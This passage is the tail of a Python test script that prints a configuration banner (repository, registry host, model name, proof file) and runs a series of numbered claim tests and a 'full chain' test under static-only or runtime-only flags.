    print(f"{'='*72}{RESET}")
    print(f"  Repo:     {REPO_ROOT}")
    print(f"  Registry: {REGISTRY_HOST}:{REGISTRY_PORT}")
    print(f"  Pull as:  {PULL_MODEL_NAME}")
    print(f"  Proof:    {PROOF_FILE}")

    skip_static = "--runtime-only" in sys.argv
    skip_runtime = "--static-only" in sys.argv

    if not skip_static:
        test_claim_1()
        test_claim_3()
        test_claim_4()
        test_claim_5()
        test_claim_7()
        test_edge_cases()

    if not skip_runtime:
        test_claim_2()
        test_claim_6()
        test_full_chain()

    success = print_summary()
    sys.exit(0 if success else 1)


if __name__ == "__main__":
    main()